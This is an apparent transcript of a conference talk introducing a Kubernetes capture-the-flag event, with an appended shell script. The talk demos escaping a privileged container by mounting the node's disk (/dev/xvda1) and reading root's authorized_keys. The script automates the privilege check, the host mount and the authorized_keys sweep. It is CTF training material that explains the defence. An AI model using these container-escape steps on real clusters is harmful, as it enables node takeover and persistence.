Hi, everyone. How's everyone doing? Has anyone been able to get a taxi this morning? Yeah, you've got the taxi. An hour. All right. So for today's CTF, there's been a number of issues getting here. And now we're trying to spin up 100 or so clusters on conference Wi-Fi. James is, I think, somewhere in the room. There's James waving now. I'll speak more about James in a moment. But thank you for having me. And it's so lovely to see everyone again in real life, especially you, Tiffany. And now I've got the stage, I just wanted to bring up and raise mental health. I suffer from depression. I know I'm not the only one who does. And the last couple of years, I understand we're going to hear a lot about it. But equally, just be aware of today as well. There's a bit of, like, seeing so many people standing up on stage. Like, I remember when I went to my first conference and I was sat in the room and it felt like, right, I'm the imposter here. I don't have a clue what anyone's talking about. We're here to learn. And so please just remember that. Or just drink water, take a breath if you need. I'll be the one who's wearing a lanyard and a mask. But if you need anyone to speak to, just come find me and we can have a chat. So you might have realized that these slides might have been made in transit here. There's a couple of us from Control Plane here today, but I just wanted to do some honorable mentions. First of all, myself, because I'm going to honorably mention myself. If you wanted to get in touch, there's me, DMs open, I'll be here all week. James, can you do that? There's James. So James is the mastermind behind the majority of the CTF. He is absolutely phenomenal. So it's definitely someone you need to check out. And finally, does anyone know who Andrew Martin is? OK, we've got a couple of hands. All right. If you see Andrew, please tell me where he is, because that would be really useful right now. But Andy, he's the CEO of Control Plane.
He was my inspiration. He gave a talk about five years ago where he did live hacking on stage. And I was like, that is not going to swear. That's the stuff I would like to be able to do. So that's why I'm here today. So previously in life, I was a software developer for a while. And well, before that, before I was a software developer, I was a kid. I think we've all been kids. And I really enjoyed solving problems, whether it be a jigsaw, whether it be whatever. I don't know why I went jigsaw, but computer games and such. I loved just solving problems. And that's what led me into computers. Back in 1999, I didn't understand what Kubernetes was, and I kind of don't really understand what it is now. But that's why we're here. But it was this problem solving which led me to my job, which is also a hobby. But I was an application developer, and I was a developer because security scared the hell out of me. I like clearly defined boundaries. I like to say that I've done a good job here. I like that. Security, for me, was like, well, I've secured it. Is it secure? I don't know. But then that realization with age came that, actually, it's just another problem for me to solve. So that's why I'm here today. So, hands up time. Who's here at this conference? Yes, I'm making, come on, come on. Thank you, thank you. All right, who ever went to a LAN party? All right, now everyone's got their hands up, see? So like, for me, LAN parties were Quake, Counter-Strike, Halo, any other honorable mentions that you'd like to shout out now? Unreal Tournament, thank you for, oh, yes, dude, how you doing? Hey, guys, yeah, great show. But for me, it was about that community aspect. It's not just playing the game. Like, I remember us taking all our cables to this house. Like, someone rented a flat. We were like, whoa, you've rented a flat. And then we went into their flat. So many TVs, oh, it was a mess. But it was so much fun. And then that was like our original meetup.
That's where we had so much pizza. So much, like, that's where we first found beer. Like, it was phenomenal. And that's where we come to today. So again, just back to problem solving there. That's what I see as CTFs. Like, CTFs, CTFs for me, even though it's capture the flag. Let me go to the next slide, because, again, transit apologies. A CTF, capture the flag, the purpose of this is to find a flag. And that's a set objective. That's clearly defining our boundaries. We know we're going into a cluster and we need to find this flag. Now, equally, when I first did my CTF, I'd never done a CTF before. I don't know what I'm doing. I feel like imposter syndrome kicking in. Like, I shouldn't be here. I don't have a clue. Now, that's what we're gonna do today. So we're gonna give you access to a CTF. Anyone done CTFs before, first of all, before I'm teaching you all how to suck eggs, which is something from the UK, which doesn't make any sense to anyone outside of the UK. Please do not suck any eggs. So, with a CTF, it gives us this learning objective. It allows us to perform the role of red team as an attacker. It allows us to do that fun thing. It allows us to be like Mr. Robot for a moment. And it's like, yes, we've taken over the world. But the importance of it is it's actually doing it. And for me, I learn best by doing. I really wish I could read a book and be able to take it straight like that. But for me, I need to do it. I need to break things. That's naturally who I am. So that's what we're doing with a CTF. So like I said, I know nothing. If you don't know anything, raise your hand, come and find us. If you're in the event, like you are here, we're just on the tables to the left over there or to the right, left, right, hard. If you're virtual online, we're also on a Slack channel. And we'll show you the Slack channel in a moment. You'll find us, and I'll mention that in a moment. But just remember, we're here to learn. There are no stupid questions.
So, yes, there aren't any stupid questions. But the one thing that I'll say is there are stupid assumptions. You are stupid if you assume that I'm going to remember you asking me what you think is a stupid question when, to me, it's an actual normal question, which I'm asked a lot of the time. So if you ever feel like this is too much for me, just come to me, like honestly, I can't remember what my last slide was. That's how terrible my memory is right now. And what we're looking for is this feeling of a LAN party that we've been to. So today, James and I and a couple of other CPUs, we're going to run through last year's CTF. Did anyone attend last year's CTF online? Did anyone get some clusters? Lovely to meet you all. There's a number of people who haven't. So if you haven't played that, we're going to play through one of the scenarios in a moment. But what we're going to do is that today, we're going to help, we're going to do some training. We're going to show you how we're going to attack these things and see how we can do these things. So that leads us on to tomorrow. So tomorrow, you're going to try harder. Now, if it's the first time you've heard "try harder", don't be, I'm not being rude. It's just saying, like, this is us. It's like, if you go to the gym, if you've taken all that effort to go to the gym and then you just do like a little sesh, that's not going to give you any gains. You can see I don't really go to the gym that much. The thing here is that we're in this area where it's like, we're going to try to enable, we're trying to help you get to that next level. That's what we're trying to do here. And so tomorrow, we're not going to give any hints or tips. We're going to have CTFd running, which means that when you find a flag, you can submit it. And what do flags make? Thank you, prizes. Thank you to the only person from the UK. And so with that, we'll have a leaderboard. And then, again, that's just for us to have some fun tomorrow.
Now, we're basing this, our whole system is based on this simulator. Please feel free to take a photo, come and ask us. We can point you towards this repo. We've had it for a while now. And in all honesty, as with many open source projects, it needs a bit more love at times. And there's lots of you here. If you enjoy what you're going to be doing today, this is what you can take home to run this yourself. This is how you can run it and pay for your own cloud bills. But what we're doing today is that we've got something else. So we've built on top of this. It's scaling it at high numbers. There's some other technology that we're here to talk about that does something similar. So we've created this little secret sauce that allows us to spin up. I'm hoping we're around like 60, 70 clusters now, James, but I can see his head's deep in a laptop. So there's a thumbs up. So for us, we've never been in this position before. So, Taskmaster. Again, for the one person from the UK, if you've seen the TV show Taskmaster, that's where this idea came from. During COVID, we created an identity because who doesn't make their own identity a market? And so the Taskmaster is there to support you. So if you want to access a cluster, if you DM the Taskmaster, the Taskmaster will send you a cluster. Now, this is at risk of DDoSing ourselves right now. So if all of you ask for a cluster, it's not going to be too much fun. And James' thumbs up will go to a thumbs down quite quickly. So please be patient with us. We're trying our best, but we will get you clusters. If you really want to play about, we'll get you sorted. Oh, yeah. And we'll do this in a demo now. The way that we provide you credentials to this cluster, we do this the most secure way that we know how, and it's by providing SSH credentials over Slack. I don't know if anyone's done that in this room, but that's how we're going to do it today and tomorrow. Thank you. Right, so it's time for a demo.
My timing is all out of sync, so let's see how far we can go. At this point, I am now going to just share my screen. Okay, that same demo, great stuff. Right, I'm going to try and refresh this. So my internet connection has been a bit temperamental. Ah, there we go. Cool. I've gone to the CNCF Slack. Hopefully some of you can see that. What's that? I walked into this room and I realized I didn't clear my history of what we previously talked about on the CNCF Slack, which was mainly panic, so I've just covered it up there. So if you go to the cloud native Slack channel, you can find it everywhere on the interwebs. You'll find the Taskmaster, CTF Taskmaster from Control Plane. All we need to do is, and hopefully the Taskmaster James is on the other side, so I'm going to say, hey Taskmaster, aka James, may I please have a cluster? Okay. So it's not like we're all just waiting for this one person in the room just to say thank you, James. All right, I'm going to download this because I'm going to trust this, and congratulations. We're using conference Wi-Fi. That deserves a clap. We've done something. Thank you. So, oh, actually at the back, this might be a bit small for you. Hopefully you can see. So I've got my in-case-of-emergency in case Slack didn't work just then. I've now got my credentials there. Oh, I got a tar bundle. So I'm going to run tar xf CubeZoom. Now, if I do an ls, that gives me the files that I need to SSH on. Again, if this is all like brand new to you, if you don't know what SSH means, honestly, I don't care that you don't know it. I will more than happily help you get over this part. So come find me. We can chat. So now that I have my credentials, I'm just going to share all of my history apparently and find this command to SSH onto the bastion. So I just need to accept that. So yes, I'm going to trust it. I'm on stage. Why wouldn't I, on conference Wi-Fi? Yes. So does anyone remember the first scenario from last year? Please be quiet then.
So I will read this out for a moment. We are a defensively-minded organization. We followed our container-y best practices, but we've got a problem. It's hard to say where it's coming from. We've discarded our build layers in a multi-stage build, scanned for known CVEs, and we're confident the container file systems are correct. But somehow our arch nemesis, the dreaded, the dreaded pirate Captain Hashjack has broken out onto the host. Inconceivable calamity, and if anyone can say that word, I will get you a drink. Follow the captain and prove out his attack path to find the flag. You will start in a Hashjack pod in a phase one blue team namespace. Okay, so there's a lot of information there. Again, if any of you have dealt with Control Plane, you'll probably know that we use lots of words at times. Now, it gave us some clues as to what we're looking for. Now, has anyone read the book Hacking Kubernetes? Yeah, cool. Thank you, thank you, thank you. If you haven't read the book, it's available in places. I don't know, we'll probably be on our booth, come find us, and then you can, yes, you can find a bit. But Hashjack is our arch nemesis in the book as well. We created a mock company for us to base this on, and so this is where the dreaded Hashjack made his debut last year at KubeCon EU. So I've done an ls just to see what I've got here, and so it just looks like I'm inside a pod. The reason I think I'm on a pod is because in the top left here, I can see that I'm on hashjack-5D4-4D5. So that to me suggests I'm within a pod that's managed by, it could be a deployment in this instance. Anyone wanna shout out anything that I could do? If you've already done this one, don't give the answer straight away. This is, it's pair hacking. I'll take lead, okay, cool. So I might just wanna have a look around, so I could check the environment variables. I can see that we're on a Kubernetes cluster. Incidentally, this is running on a real cluster.
This isn't any other magic. This isn't us trying to just like put this facade of words in front of you. This is an actual cluster running on one of the cloud providers, and then you've got full access to these nodes. Incidentally, the VMs are your own when we spin these up. So the environment variables don't give too much. I could have a look at processes. I could, if I could type. The nerves, the nerves. Cool. I guess I can just see that we're doing sleep infinity, which I plan to do by about this time next week. So, how am I doing on time? Okay, let's, I think I might finish a little bit early, but then we can all get refreshments. So, the one useful thing here would probably be to see what we have mounted in. So we can see we've got a service account available there. That might be of interest in other scenarios, so if you wanna play about today, then I'd look there. But the one here that I'm really interested in is mount. So, if I run mount, I start to see that there are some things mounted in here that are of interest to me. The one that I have of interest is /dev/xvda1. So that instantly can start to identify where I might be running this VM. But it also gives me a point of attack. And remember, when you are doing this CTF, if you want to just check again, just disconnect, reconnect, see this message. If I've lost my connection now after doing that, I'm gonna be fuming. And we can read this again. So the point of what we're trying to find here is, we're trying to find out what Hashjack did to persist, to prove out the attack path that Hashjack took, and then we're gonna look for some persistence as to what they did next. So we looked at mount and then we found that we had xvda1. Now again, just to say, because if you're new to Linux, if this is your first KubeCon, again, please come find us. I remember mine fondly and I was intimidated, but it's all about dropping a letter. So I'm more than happy to help you up to this point.
Within the Linux file system, when we mount something, we're mounting data onto it. So the way that I like to think of it is just like a USB stick. If you're running Windows or macOS, you just connect that memory stick in, and then it's in your file system, you can access it. On Linux, we need to use mount. It's a little bit different. So what I can do is actually, let me just prepare this a little bit better. So if we check with ls on /mnt, we can see that there's nothing in there at the moment. But now if we mount /dev/xvda1 into /mnt, and then we'll just replay that command that we had a moment ago. And now we've mounted this disk onto our container. And now we can see it within there. So hopefully that brings it to there if you're brand new to this. But this is interesting. This looks like a file system that is similar to our container, but there's a little bit more in there. So this is probably the attack path that Hashjack took to persist a connection. So let's just change directory to /mnt because that usually confuses me at this point. So now we're mounted into another file system. So how am I gonna attack, persist a connection? I realized I'm a little bit quick on my timing, so that's why I'm holding for effect. So what he's done is SSH. So I'm gonna assume that this is a virtual machine, and there's other things that I could do to start identifying a virtual machine. If you wanna do those things, again, give us a shout, we'll give you scenarios, you can play about with this yourself and find other flags. But I'm just going straight for a kill here. So I'm gonna just check what the root user has, but I'm not gonna find it with just an ls. So if I check root, I can see that we've got a .ssh directory there. So let's move into root and go to .ssh. Instantly, if it starts with a dot, then it's just a hidden directory or a hidden file. So now if we have a look here, we can see our authorized_keys.
And so if I cat our authorized_keys, we can see all the keys that we can use to access this. Then at the bottom, we can see just here, let's bring it up a little bit. Pirate code, note to self, don't misplace this flag, yours, CC Hashjack, PS, and then here's our flag. So this is our introduction yesterday, and I'll explain a bit of what's happened here now in a moment, but what you would do tomorrow is when you find a flag like this, you'd go to CTFd, which we'll give you a link to. You submit this flag and then you get points. This is the whole purpose of a capture the flag. Now we're showing you this attack path, we're showing you what's happened here, but we haven't really described what it was. Does anyone know what happened there, why we were able to access that? Now if you did it last year, you're more than welcome to shout out. Definitely silence. So that was a privileged container. And so, does anyone know privileged containers in here, or are we all absolutely dead? Okay, we got a couple, okay, sweet. So a privileged container, why might you use a privileged container? So containers, we use them to isolate our workloads, and in isolation using Linux namespaces and cgroups, that isolation means that we're not really, like we don't have access outside of that, because that's what we want, we want this boundary. Now, if you're running a workload that's dependent on something on the machine, then you need to look at the capabilities that are available within that container. Now if you go onto one of those favorite websites, so I can take you from your favorite search engine to say that this bug is happening, someone might suggest you run a privileged container. The only problem is running a privileged container essentially means that you're running as root on that virtual machine. And so that's what happened for us.
This container within this pod was being run as privileged, and running as privileged meant that we had access to xvda1, which was the file system on the virtual machine, and then when we moved across into that, we were able to act as root on that machine. Cool. And so then we had to look, and then Hashjack in this instance, instead of having to do this attack path to get into this container to then break out of it, by adding the public key into the authorized_keys, they were able to SSH onto the node. At this moment in time, it's pretty much game over for this node. This isn't ideal whatsoever. So that's what it's taught us. Points to mention: there's a number of us from Control Plane who are giving talks over this week, everything from operators to threat modeling to anything else. So please come find us. You'll find we've got like these T-shirts with Control Plane written on them. How would you mitigate against this kind of attack, incidentally? Run a privileged container. You shouldn't be running a privileged container if you are. Don't worry if you are, incidentally. We run this quite often with our training, and I've been in training before where someone's had to run quite quickly because it was in production. So don't worry, but look at the capabilities. Instead, focus on least privilege: you want to not give, like, everything with a privileged flag, just look at what it needs to enable. Equally, defense in depth, I'm probably talking, well, sorry, defense in depth, yes. So if we threat model this, then we don't want to run a privileged container for our web public for runtimes, we don't want to run a privileged container anyway. We can have defense in depth. Okay, it's at 20 past. I'm pretty much sure I am done on everything else. Thank you for your time. If you do have any questions, then I'm more than happy to take them now. If you'd rather just start hacking away, then please DM the Taskmaster.
We will get you a cluster as soon as possible. Was this of interest to anyone, or am I just going to fear this, can I? Oh, hello, hello. So thank you ever so much. If you want to find us, we'll just be on the tables out there. But I hope you enjoy your KubeCon. Don't be a stranger, and I'm hoping to see you soon.
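The steps the speaker typed by hand in the Hashjack scenario (check what you are, mount the node's disk, read root's authorized_keys), collected into an added shell example. This is not code from the talk, from Control Plane's simulator or from the CTF; the function names, the /mnt/host mount point and the fixture filesystem built by make_fixture are my own constructions, and the keys in that fixture are not real public keys. What it adds to the walkthrough is the "am I privileged?" test: mount(2) on a block device needs CAP_SYS_ADMIN (capability number 21), and a privileged container holds every capability (CapEff reads 000001ffffffffff, or 0000003fffffffff on older kernels) and can see the node's device nodes such as /dev/xvda1; a default unprivileged container (CapEff 00000000a80425fb) holds neither, which is the least-privilege point the speaker closes on.

```shell
#!/bin/sh
# Added example; not part of the talk or the simulator. Assumed names:
# cap_has_sys_admin, self_is_privileged, mount_host_root, find_ssh_persistence, make_fixture.

# CAP_SYS_ADMIN is capability 21. A privileged container's effective set has
# every bit set; the default container set (0xa80425fb) leaves bit 21 clear.
cap_has_sys_admin() {
  caps="$1"                      # hex string as printed in /proc/<pid>/status
  [ $(( 0x$caps >> 21 & 1 )) -eq 1 ]
}

# Reads the current process's effective capability mask from /proc.
self_is_privileged() {
  caps=$(awk '/^CapEff:/ { print $2 }' /proc/self/status)
  cap_has_sys_admin "$caps"
}

# The speaker's `mount /dev/xvda1 /mnt` step; only works when the device node is
# visible and we hold CAP_SYS_ADMIN, i.e. in a privileged container.
mount_host_root() {
  dev="$1"; mnt="${2:-/mnt/host}"   # /mnt/host is an assumed default
  mkdir -p "$mnt"
  mount "$dev" "$mnt"
  echo "$mnt"
}

# Sweeps root's and every home directory's authorized_keys under a mounted host
# root and prints one line per key (type + comment) or per '#' note. The flag
# in the talk was sitting in exactly this kind of trailing text.
find_ssh_persistence() {
  root="$1"
  for f in "$root"/root/.ssh/authorized_keys "$root"/home/*/.ssh/authorized_keys; do
    [ -f "$f" ] || continue
    awk -v file="$f" '
      /^#/      { printf "%s|note|%s\n", file, $0; next }
      NF >= 2   { c = ""
                  for (i = 3; i <= NF; i++) c = c (i > 3 ? " " : "") $i
                  printf "%s|key|%s|%s\n", file, $1, c }
    ' "$f"
  done
}

# Constructed stand-in for a mounted node filesystem, so the sweep can run
# offline. The key blobs are placeholders, not real public keys.
make_fixture() {
  root=$(mktemp -d)
  mkdir -p "$root/root/.ssh" "$root/home/deploy/.ssh"
  cat > "$root/root/.ssh/authorized_keys" <<'EOF'
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleOperatorKeyNotReal ops@example
# note to self: don't misplace this
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQExamplePirateKeyNotReal pirate-persistence
EOF
  printf 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleDeployKeyNotReal deploy@example\n' \
    > "$root/home/deploy/.ssh/authorized_keys"
  echo "$root"
}

# Inside the suspect pod the real sequence would be:
#   self_is_privileged && mnt=$(mount_host_root /dev/xvda1) && find_ssh_persistence "$mnt"
# `--demo` runs the sweep against the constructed fixture instead.
if [ "${1:-}" = "--demo" ]; then
  root=$(make_fixture)
  find_ssh_persistence "$root"
  rm -rf "$root"
fi
```

A workload that has `privileged: false` and only the capabilities it actually needs fails `self_is_privileged`, cannot see /dev/xvda1 and cannot call mount, so the whole path the captain took is closed off at the first step; that is the practical content of "look at what it needs to enable" rather than reaching for the privileged flag.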